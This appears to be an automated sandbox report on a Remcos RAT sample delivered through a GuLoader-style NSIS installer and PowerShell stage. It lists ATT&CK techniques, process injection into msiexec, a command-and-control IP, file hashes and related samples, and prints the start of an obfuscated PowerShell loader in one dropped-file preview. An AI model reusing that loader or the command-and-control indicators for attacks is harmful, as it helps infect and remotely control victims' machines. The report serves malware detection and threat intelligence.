            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7060, type: MEMORYSTR

            Remote Access Functionality

            Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-GC7VQU
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7060, type: MEMORYSTR
            MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the figure shown with that technique in the matrix)

            Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
            Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
            Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
            Execution: Windows Management Instrumentation (1), PowerShell (2), At, Cron, Launchd, Scheduled Task, Systemd Timers
            Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
            Privilege Escalation: Access Token Manipulation (1), Process Injection (312), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items
            Defense Evasion: Masquerading (11), Virtualization/Sandbox Evasion (131), Access Token Manipulation (1), Process Injection (312), Obfuscated Files or Information (1), Software Packing (1), DLL Side-Loading (1)
            Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
            Discovery: Security Software Discovery (211), Process Discovery (2), Virtualization/Sandbox Evasion (131), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (14), Remote System Discovery
            Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
            Collection: Archive Collected Data (1), Clipboard Data (1), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
            Command and Control: Encrypted Channel (11), Non-Standard Port (1), Remote Access Software (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (113), Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
            Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
            Behavior Graph (ID 1588308, sample WtZl31OLfA.exe, start date 10/01/2025, architecture WINDOWS, score 100); the graph image is not reproduced, its node data were:
            Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for dropped file; 8 other signatures. Domains: drive.usercontent.google.com, drive.google.com.
            WtZl31OLfA.exe started. Dropped: C:\Users\user\AppData\Local\...\nsExec.dll (PE32), C:\Users\user\AppData\Local\...\Kbmand.Too (Unicode). Signature: Suspicious powershell command line found.
            -> powershell.exe started. Dropped: C:\Users\user\AppData\...\WtZl31OLfA.exe (PE32), C:\Users\...\WtZl31OLfA.exe:Zone.Identifier (ASCII). Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures.
            -> msiexec.exe started (conhost.exe also started). Network: 87.120.116.187 (ports 49440, 49457, 49473; UNACS-AS-BG8000BurgasBG, Bulgaria); drive.google.com 142.250.185.78 (ports 443, 49396; GOOGLEUS, United States); drive.usercontent.google.com 172.217.16.129 (ports 443, 49406; GOOGLEUS, United States). Signatures: Detected Remcos RAT; Hides threads from debuggers.

            Source | Detection | Scanner | Label | Link
            WtZl31OLfA.exe | 58% | ReversingLabs | Win32.Backdoor.Remcos |
            WtZl31OLfA.exe | 72% | Virustotal | |
            WtZl31OLfA.exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe | 58% | ReversingLabs | Win32.Backdoor.Remcos |

            No Antivirus matches

            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            http://www.skinstudio.netG | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            drive.google.com | 142.250.185.78 | true | false | | high
            drive.usercontent.google.com | 172.217.16.129 | true | false | | high
                NameSourceMaliciousAntivirus DetectionReputation
                https://www.google.commsiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
URL | Source | Malicious | Antivirus Detection | Reputation
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://translate.google.com/translate_a/element.js | msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/ | msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/A | msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lBeq | powershell.exe, 00000001.00000002.2281239821.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/; | msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://apis.google.com | msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | WtZl31OLfA.exe, WtZl31OLfA.exe.1.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2281239821.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.skinstudio.netG | WtZl31OLfA.exe, WtZl31OLfA.exe.1.dr | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.78 | drive.google.com | United States | 15169 | GOOGLEUS | false
172.217.16.129 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
87.120.116.187 | unknown | Bulgaria | 25206 | UNACS-AS-BG8000BurgasBG | true
                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588308
                                                          Start date and time:2025-01-10 23:48:47 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 3s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:WtZl31OLfA.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:293ebd610b0542289ffe9a52cab2c2a434dcff94918045a5ed1497deaee5eb87.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@6/13@2/3
                                                          EGA Information:
                                                          • Successful, ratio: 33.3%
                                                          HCA Information:
                                                          • Successful, ratio: 92%
                                                          • Number of executed functions: 79
                                                          • Number of non-executed functions: 48
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 4396 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
17:49:39 | API Interceptor | 34x Sleep call for process: powershell.exe modified
17:50:49 | API Interceptor | 3600631x Sleep call for process: msiexec.exe modified
                                                          No context
                                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
UNACS-AS-BG8000BurgasBG | C5Zr4LSzmp.exe | Get hash | malicious | RedLine | Browse | 87.120.120.86
UNACS-AS-BG8000BurgasBG | C5Zr4LSzmp.exe | Get hash | malicious | RedLine | Browse | 87.120.120.86
UNACS-AS-BG8000BurgasBG | 2XnMqJW0u1.exe | Get hash | malicious | XWorm | Browse | 87.120.120.15
UNACS-AS-BG8000BurgasBG | VmoLw6EKj5.exe | Get hash | malicious | RedLine | Browse | 87.120.120.86
UNACS-AS-BG8000BurgasBG | QwMcsmYcxv.exe | Get hash | malicious | AsyncRAT, VenomRAT | Browse | 87.120.120.15
UNACS-AS-BG8000BurgasBG | QwMcsmYcxv.exe | Get hash | malicious | AsyncRAT, VenomRAT | Browse | 87.120.120.15
UNACS-AS-BG8000BurgasBG | Xf3rn1smZw.exe | Get hash | malicious | RedLine | Browse | 87.120.120.86
UNACS-AS-BG8000BurgasBG | wqSmINeWgm.exe | Get hash | malicious | RedLine | Browse | 87.120.120.7
UNACS-AS-BG8000BurgasBG | 2eRd5imEKU.exe | Get hash | malicious | RedLine | Browse | 87.120.120.86
UNACS-AS-BG8000BurgasBG | 2eRd5imEKU.exe | Get hash | malicious | RedLine | Browse | 87.120.120.86
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | czHx16QwGQ.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | Setup.exe | Get hash | malicious | Unknown | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | rXKfKM0T49.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | 4Vx2rUlb0f.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | b5BQbAhwVD.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | 9Yn5tjyOgT.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | 6ZoBPR3isG.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | V7OHj6ISEo.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | 2CQ2zMn0hb.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 142.250.185.78, 172.217.16.129
37f463bf4616ecd445d4a1937da06e19 | 6mGpn6kupm.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 142.250.185.78, 172.217.16.129
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | 4Vx2rUlb0f.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | TeamViewer_Setup.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | DHL TAX INVOICES - MARCH 2024.exe | Get hash | malicious | Remcos, GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | REF_17218_VV-0002.exe | Get hash | malicious | FormBook, GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | PO_00290292.exe | Get hash | malicious | AgentTesla, GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | teamviewer_Px-yDq1.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | teamviewer_Px-yDq1.exe | Get hash | malicious | Unknown | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | SMGS-RCDU5010031.exe | Get hash | malicious | GuLoader, Remcos | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | SMGS-RCDU5010031.exe | Get hash | malicious | GuLoader | Browse |
C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll | RC_S23_3274 Or_amento ADP 231019_5_5009.exe | Get hash | malicious | GuLoader, Remcos | Browse |
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):53158
                                                                              Entropy (8bit):5.062687652912555
                                                                              Encrypted:false
                                                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                              MD5:5D430F1344CE89737902AEC47C61C930
                                                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):6656
                                                                              Entropy (8bit):5.140229856656103
                                                                              Encrypted:false
                                                                              SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                                              MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                                              SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                                              SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                                              SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: 4Vx2rUlb0f.exe, Detection: malicious, Browse
                                                                              • Filename: TeamViewer_Setup.exe, Detection: malicious, Browse
                                                                              • Filename: DHL TAX INVOICES - MARCH 2024.exe, Detection: malicious, Browse
                                                                              • Filename: REF_17218_VV-0002.exe, Detection: malicious, Browse
                                                                              • Filename: PO_00290292.exe, Detection: malicious, Browse
                                                                              • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                              • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                              • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                              • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                              • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):362270
                                                                              Entropy (8bit):1.2455855418607977
                                                                              Encrypted:false
                                                                              SSDEEP:1536:8ISzVYclAygkWLgNhIaJiUYphjwPRryaqA:8bduh6hKUYp5aryaz
                                                                              MD5:9FA2163989C46356E859FEA0B8963C98
                                                                              SHA1:7C4909CBFBFBE47621E33E4FFCBDD07305BFB61A
                                                                              SHA-256:3F02D54A3EC1FECE8CC150F8C9DE04BA12D69A8A221AC97D64161E76E52DF25C
                                                                              SHA-512:39B7C5856903FEA66941551A89E936035C35A98C5B7587F34333626995F4D0A2A1B88E4CAC03865F9785BEF36E272875D84E3CCF221513D7139A4237085021F6
                                                                              Malicious:false
                                                                              Preview:.......c.....W.................X...{..................................c.......................................................>.................................^......y..................B..)....................................................X...........^.......................j.............}.................................%.................;....................................................................................................................f.....................................................................T........E.............................0......................>............................OJ..........................~........................~......G..............................i.s...........a...%........:...........?..........>v...........................................................................................a.,.............................."..................7..........................................).]............................P.................
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):261410
                                                                              Entropy (8bit):1.2549428792982014
                                                                              Encrypted:false
                                                                              SSDEEP:768:Qwiy4uufWUw/8VP6g263Bho3fURSx13Q3pA/988PSEAyx6NQB1lir1f/R/qwV5iw:QDbZBhAUEoIGV/xh5DcPJsc/1si2
                                                                              MD5:37AEF816B4DE967A79095F52FE324B50
                                                                              SHA1:5F77040A1BF5EC66220083597D4FAA06F5FE1B9D
                                                                              SHA-256:3627F4556F8AC2105AB3DC8A5F0C149E1D8DE3520E50447F7F654DA939BA6946
                                                                              SHA-512:D65B2C9B80A825D3C77173E50D3A10F7FDAECCD58E2E385A095DDC2FB97554B8C6E027776333537A3B88226BDEC2A54A9B21E74E138556667E0B6C35491BC2A0
                                                                              Malicious:false
                                                                              Preview:..........................c..........................................................................................................L......................................0......................)....................1D......................R....|.............................................................................c.........................Y..H............{......3...............s.........Z.................!.....{.......................$.............................................J........................,.............[......M...............;....................................................k..2.z...............................s.........R..............................J....g......................................................................................>.....................n....s.......................................................z...........?..................................4............r...............................................................................
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:Unicode text, UTF-8 text, with very long lines (4063), with CRLF, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):71199
                                                                              Entropy (8bit):5.191883863450341
                                                                              Encrypted:false
                                                                              SSDEEP:1536:Wy50HRVnVGWD9puiJ3liasWArPPOTEzN+goGGTssVRzm:cHHrD2M3AbOWQgoGSs2xm
                                                                              MD5:FE436DB316FBC26E45E0E549EF823194
                                                                              SHA1:A6167E8EDABA364577375393344D64D7D29E5455
                                                                              SHA-256:FD88A6B7F747F43380875AF5FA4EF6B735AFD1C52D0A75D1E14513FCA9F26AD4
                                                                              SHA-512:05E48C88BE028FFA2724EC129DF3B9B2125F4B07AE50A9B8F6010443C94489BDC8FBC533DCABF40D9AFD1B8E0CAD95FAA2C94C10E703C0C63E43ADAAE5BF3868
                                                                              Malicious:true
                                                                              Preview:$Modforanstaltninger=$Vejrkortene;........$Reeksaminationen = @'. Rekvis. I pers$DendrolSBentle,vLdervineIntetkndStyrtsesG llate= Sikred$ Afd ypsOpbygniy OdorabnTyrannisHobbyplpSpartanununciatnTeeterikB gflikt Germa sSluknin; Odys,e.Bo gmesfTaktreguAn oneinParochic Udrenst forsigiGongmano FlannenCholat AfskrkkEYawe.praxerophir CachoutBo klorhEfters,eNon,etenThanatowLysaarsaStilartrAmi ajue ementss Steppe Uklart( Skrive$LeptorrCHeterosyPapirmacAutomatlProxicao agersesReins,itMuggeanoB.yholdmMenusekoDrvtygguBi.dbersOpdra,s, orsel$juttingPTokessalBerkshiu HectowcBkkenbukMyrialii HistrieVedholdr In kri)Merribu f.skesn{Trdepud.Provoca.untragi$ AeolipN FreelaoPycniaan nternmeDet,ctsncal.bratAbmhoo iIndtrngcSuperkaiHoisternHarmonygSt dent Nskedes(JanttysI RadiopnDaaseaafNonmatei ExpedilStatsadtSknderirSeraphiaUslukketCevadinoS ereefrTowmontsUndersl ,icturi'SaalskaFCincinnaOms,ggrg Clodl lSplashir.pholsteDiakron,Thiopyr$PrestidBTesteeseUnrendefD onysioViceam lUnfatedkAcerbernK.nsthiCPlo to
                                                                              Process:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):327294
                                                                              Entropy (8bit):7.6223354315073255
                                                                              Encrypted:false
                                                                              SSDEEP:6144:TUUzuojppPnxOkKpGoE3HWJhx6nQR94vya2XzSe5R9ECWTCqka:TUUXvnxOkKKERGL2XzSijECWWqN
                                                                              MD5:55AC96F564DC8F6B82FA7E240D6EEE3A
                                                                              SHA1:6B141E40FB89357DDF8F54DFF918689C21883F0D
                                                                              SHA-256:843565DD040BB35626B2C30EEDD8928EFA98FA4C221AC6DA35A350F35FAF270A
                                                                              SHA-512:2A41085CCF49E8E7C8659D2D211042628BC22946F3EA969AC5CD1C5CD089B663C48CEADC7CBD08F5C2DF736F4A2BE10F96B6B968988CA92DB892EF65A8B124DF
                                                                              Malicious:false
